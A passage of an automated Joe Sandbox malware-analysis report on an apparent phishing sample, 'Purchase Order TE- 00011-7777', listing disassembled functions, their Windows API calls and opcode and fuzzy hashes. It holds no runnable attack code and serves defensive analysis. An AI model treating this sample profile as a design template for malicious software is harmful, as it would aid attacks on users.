                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                      • String ID:
                      • API String ID: 1504782959-0
                      • Opcode ID: 92027d6b011fa79d190c615a22493dabc0e6ff40aaa77c1041fc1578d2972d48
                      • Instruction ID: 901c725e4d550f5df8075337626d740bf923dc676a59442e93d15d098a937a25
                      • Opcode Fuzzy Hash: 92027d6b011fa79d190c615a22493dabc0e6ff40aaa77c1041fc1578d2972d48
                      • Instruction Fuzzy Hash: 13112B76A00109AFCF05FBA1CE56DEEB7B9EF14311B544065F506AB2A2DB30AE14CB61
                      Function 00ACC265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00ACC285
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC297
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2AD
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ACC2C8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID:
                      • API String ID: 3850602802-0
                      • Opcode ID: f65b801152febe986deba83e051a3cd4094f5745c6f3853b03281b4afb29fe50
                      • Instruction ID: 7ec8d69bfc31d972248cd528b6f77f3db9ba607f5236cd67fdda0fefc7369a27
                      • Opcode Fuzzy Hash: f65b801152febe986deba83e051a3cd4094f5745c6f3853b03281b4afb29fe50
                      • Instruction Fuzzy Hash: 5711187A940218FFDB11DBD8C985FDDBBB8FB08710F214095EA05B7294D671AE10DB94
                      Function 00AD7C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 00AD7C6C
                      • MessageBoxW.USER32(?,?,?,?), ref: 00AD7C9F
                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AD7CB5
                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AD7CBC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                      • String ID:
                      • API String ID: 2880819207-0
                      • Opcode ID: 2d3f058c560b3004b3bb8f1f6fe9b31fac9e513a743bfe8602fe999383a9e7a6
                      • Instruction ID: d23d223c5b1677fe6d5ac76bb7060dc91802a3384656e42a255cc4ea0e5f191c
                      • Opcode Fuzzy Hash: 2d3f058c560b3004b3bb8f1f6fe9b31fac9e513a743bfe8602fe999383a9e7a6
                      • Instruction Fuzzy Hash: 04110472A04204BFE7029BA89C08BDE7FADAB04725F144256F926E3391EA708D1487A0
                      Function 00AAC619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                      Download Yara Rule
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                      • GetStockObject.GDI32(00000011), ref: 00AAC66B
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateMessageObjectSendStockWindow
                      • String ID:
                      • API String ID: 3970641297-0
                      • Opcode ID: cd0be9cb3aa1adf8bfc0a764c1109b7f7402ed822e2092e9bc4befdf5b060aa4
                      • Instruction ID: 1af8fcf3b5fbfd4bded055472f927dd1aae2d50bd31cadbd5b5d7d7dac921673
                      • Opcode Fuzzy Hash: cd0be9cb3aa1adf8bfc0a764c1109b7f7402ed822e2092e9bc4befdf5b060aa4
                      • Instruction Fuzzy Hash: 5B118072501659BFEF128FA49C54EEABB69FF0A364F055215FA04531A0DB32DC60DBA0
                      Function 00AD49D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                      Download Yara Rule
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD49EE
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD4A13
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD4A1D
                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD4A50
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: f34a15d2fe87b273946630412fc20a58bc1c641db69bea542c871593f11091f0
                      • Instruction ID: 54a1a73d882b68ad4a2bc1cd9adc1e7410458dd1079ca20a29da7a0843e2c210
                      • Opcode Fuzzy Hash: f34a15d2fe87b273946630412fc20a58bc1c641db69bea542c871593f11091f0
                      • Instruction Fuzzy Hash: 3F112A71D40528EBCF00EFA5DA89AEEBB74FF09751F414056E946B7250CB309560CBA9
                      Function 00AC5BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                      • Instruction ID: 5a298768dd01d6d5aa6baef9219668fd4f0b1840d49f09c394f080420d782c13
                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                      • Instruction Fuzzy Hash: AA018C3280464EBBCF125F94DD41DEE3F62BF18350B5A8818FE2859031D232DAB1AB81
                      Function 00AB80E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AB869D: __getptd_noexit.LIBCMT ref: 00AB869E
                      • __lock.LIBCMT ref: 00AB811F
                      • InterlockedDecrement.KERNEL32(?), ref: 00AB813C
                      • _free.LIBCMT ref: 00AB814F
                      • InterlockedIncrement.KERNEL32(01389A78), ref: 00AB8167
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                      • String ID:
                      • API String ID: 2704283638-0
                      • Opcode ID: c175134ae7fb7ec8ba83929ed950599e415b77af4ed5299fce6966f9a6bb6fc8
                      • Instruction ID: 6f64956d71005e35df8e1536d6f6cd76188472f656fa71ccf4583f5c4addfa20
                      • Opcode Fuzzy Hash: c175134ae7fb7ec8ba83929ed950599e415b77af4ed5299fce6966f9a6bb6fc8
                      • Instruction Fuzzy Hash: BB01D232942621ABDB11AF6CA94A7DD73BCBF05710F040209F41067293DF389A42DBD6
                      Function 00AFDDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00AFDE07
                      • ScreenToClient.USER32(?,?), ref: 00AFDE1F
                      • ScreenToClient.USER32(?,?), ref: 00AFDE43
                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFDE5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      • Opcode ID: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                      • Instruction ID: 2bf1f4dce0ecf34be92a3cecd4583d36d35a029955a96178d0cacec0216e4ace
                      • Opcode Fuzzy Hash: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                      • Instruction Fuzzy Hash: E9112DB9D00209EFDB41DFA9C8849EEBBF9FB08310F508166E925E3214DB35AA55CF50
                      Function 00AB8724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __lock.LIBCMT ref: 00AB8768
                        • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                        • Part of subcall function 00AB8984: EnterCriticalSection.KERNEL32(00AB0127,?,00AB876D,0000000D), ref: 00AB89AF
                      • InterlockedIncrement.KERNEL32(DC840F00), ref: 00AB8775
                      • __lock.LIBCMT ref: 00AB8789
                      • ___addlocaleref.LIBCMT ref: 00AB87A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                      • String ID:
                      • API String ID: 1687444384-0
                      • Opcode ID: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                      • Instruction ID: 5c6e0d6e0a578f4f6a2fa8be79b1cc12f1d3423108042058b74cf60ee96361d6
                      • Opcode Fuzzy Hash: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                      • Instruction Fuzzy Hash: 0C016D72440B00AFD760EF69D905799F7F8FF40325F20890EE4A9872A2CFB4A680CB01
                      Function 00AFE13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AFE14D
                      • _memset.LIBCMT ref: 00AFE15C
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B53EE0,00B53F24), ref: 00AFE18B
                      • CloseHandle.KERNEL32 ref: 00AFE19D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memset$CloseCreateHandleProcess
                      • String ID:
                      • API String ID: 3277943733-0
                      • Opcode ID: c6aaf723d8a1a75f6de005ef2900c3baee3e874e6fe7296d367a9e33728716ac
                      • Instruction ID: 720d9048e14cddf1b3ced5491bbadfeb4c58f0b468035663f59de101dcbd9ca3
                      • Opcode Fuzzy Hash: c6aaf723d8a1a75f6de005ef2900c3baee3e874e6fe7296d367a9e33728716ac
                      • Instruction Fuzzy Hash: 26F05EF1940314BFF2105B65AC56FB77AECDB09BD6F404460FE04D62A2DBB68E1096B8
                      Function 00AD9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                      Download Yara Rule
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 00AD9C7F
                        • Part of subcall function 00ADAD14: _memset.LIBCMT ref: 00ADAD49
                      • _memmove.LIBCMT ref: 00AD9CA2
                      • _memset.LIBCMT ref: 00AD9CAF
                      • LeaveCriticalSection.KERNEL32(?), ref: 00AD9CBF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalSection_memset$EnterLeave_memmove
                      • String ID:
                      • API String ID: 48991266-0
                      • Opcode ID: 42c7d91e5af877b26964b8d8ceb25493e4281596f48c5d476d1f41a86d2dbd34
                      • Instruction ID: 5987653c77608abc8222b898d6cff4e509a9cec37b9c7f56ed93f1ce77e675bb
                      • Opcode Fuzzy Hash: 42c7d91e5af877b26964b8d8ceb25493e4281596f48c5d476d1f41a86d2dbd34
                      • Instruction Fuzzy Hash: 26F03A7A200000AFCB016F54EC85A8ABB69EF45360B48C062FE099F217CB31E911DBB5
                      Function 00AFE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                        • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFE860
                      • LineTo.GDI32(00000000,?,?), ref: 00AFE86D
                      • EndPath.GDI32(00000000), ref: 00AFE87D
                      • StrokePath.GDI32(00000000), ref: 00AFE88B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                      • String ID:
                      • API String ID: 1539411459-0
                      • Opcode ID: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                      • Instruction ID: 88d76814d27a50def49ceb76c25ff75634059add615cc06fc72a55cd73476de2
                      • Opcode Fuzzy Hash: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                      • Instruction Fuzzy Hash: C4F05E31001259BBDB126F94AC0DFDE3F99AF0A311F448141FA11660E1CB795661DFE5
                      Function 00ACD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                      • GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                      • AttachThreadInput.USER32(00000000), ref: 00ACD661
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      • Opcode ID: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                      • Instruction ID: 485ece6d42f1f6f3df12c0afd2bed2512d24656aa7a08705c3329781bc43afdd
                      • Opcode Fuzzy Hash: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                      • Instruction Fuzzy Hash: F4E0C971541228BADB215FA29C0DFDB7F6CEF567A1F808025BA0D96060DF759590CBA0
                      Function 00ACBDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 00ACBE01
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00ACB9C9), ref: 00ACBE08
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00ACB9C9), ref: 00ACBE15
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00ACB9C9), ref: 00ACBE1C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: 865af6ef017bb55c79ec7ae4457e641a088eeaef8b75850833a7f4d0af74c302
                      • Instruction ID: 389df40b52acfa79ba0525d105bf0b0b52c7892c17ba9b70e076a09f75c2e7fd
                      • Opcode Fuzzy Hash: 865af6ef017bb55c79ec7ae4457e641a088eeaef8b75850833a7f4d0af74c302
                      • Instruction Fuzzy Hash: 7DE08632641221ABD7105FB1AC0DFD73BA8EF58B92F01C818F241DB040DB388441C765
                      Function 00AAB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00AAB0C5
                      • SetTextColor.GDI32(?,000000FF), ref: 00AAB0CF
                      • SetBkMode.GDI32(?,00000001), ref: 00AAB0E4
                      • GetStockObject.GDI32(00000005), ref: 00AAB0EC
                      • GetWindowDC.USER32(?,00000000), ref: 00B0ECFA
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B0ED07
                      • GetPixel.GDI32(00000000,?,00000000), ref: 00B0ED20
                      • GetPixel.GDI32(00000000,00000000,?), ref: 00B0ED39
                      • GetPixel.GDI32(00000000,?,?), ref: 00B0ED59
                      • ReleaseDC.USER32(?,00000000), ref: 00B0ED64
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                      • String ID:
                      • API String ID: 1946975507-0
                      • Opcode ID: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                      • Instruction ID: 3c40fd757340a1295701f1395ef0eb55a5514f532a0f6389c054ce41c737104d
                      • Opcode Fuzzy Hash: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                      • Instruction Fuzzy Hash: E1E0ED31500240BEEB215F74AC497D87F61EB56335F54C366F779690E2CB728590DB11
                      Function 00B0C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: dfdcc2ab53e22c266c5e50cbe3a3af508bf2214e3d9e9cb760317f3e1f8737e3
                      • Instruction ID: a8506b95f566c5c8715c47eacf0d1418c8a7ccd072f55f08fe74fead2a896708
                      • Opcode Fuzzy Hash: dfdcc2ab53e22c266c5e50cbe3a3af508bf2214e3d9e9cb760317f3e1f8737e3
                      • Instruction Fuzzy Hash: AFE092B5540204EFDB009F709888AA97FE9EB4C361F51C816F94A8B291EFB999819B50
                      Function 00ACC066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ACC071
                      • UnloadUserProfile.USERENV(?,?), ref: 00ACC07D
                      • CloseHandle.KERNEL32(?), ref: 00ACC086
                      • CloseHandle.KERNEL32(?), ref: 00ACC08E
                        • Part of subcall function 00ACB850: GetProcessHeap.KERNEL32(00000000,?,00ACB574), ref: 00ACB857
                        • Part of subcall function 00ACB850: HeapFree.KERNEL32(00000000), ref: 00ACB85E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
